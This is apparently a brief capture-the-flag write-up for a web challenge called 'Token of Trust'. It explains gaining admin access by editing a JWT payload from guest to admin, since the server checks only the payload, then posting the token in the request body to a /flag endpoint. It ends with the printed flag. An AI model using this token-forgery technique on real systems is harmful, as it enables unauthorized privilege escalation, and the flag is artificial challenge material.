Token of Trust
I didn't have any information I could get other than that I could log in from /login
So I expected robots.txt exist.
Disallow: /flag (But hey, who listens to robots anyway?)
there is flag api endpoint but i can't GET it
I guess it is POST method
Hint: I only care about your request format, not your credentials. 😉
So I think solution
1. cracked jwt with admin
- This vulnerability occurs because only the encoded jwt payload is checked
2. request flag with jwt token (include in http body)
I request with normal login request and get token
change jwt payload guest -> admin
i POST with "token object" and get flag!
It was difficult because I thought tokens should only be included in cookies, but I eventually solved this problem by thinking of putting them in body!
FLAG: ACECTF{jwt_cr4ck3d_4dm1n_4cce55_0bt41n3d!}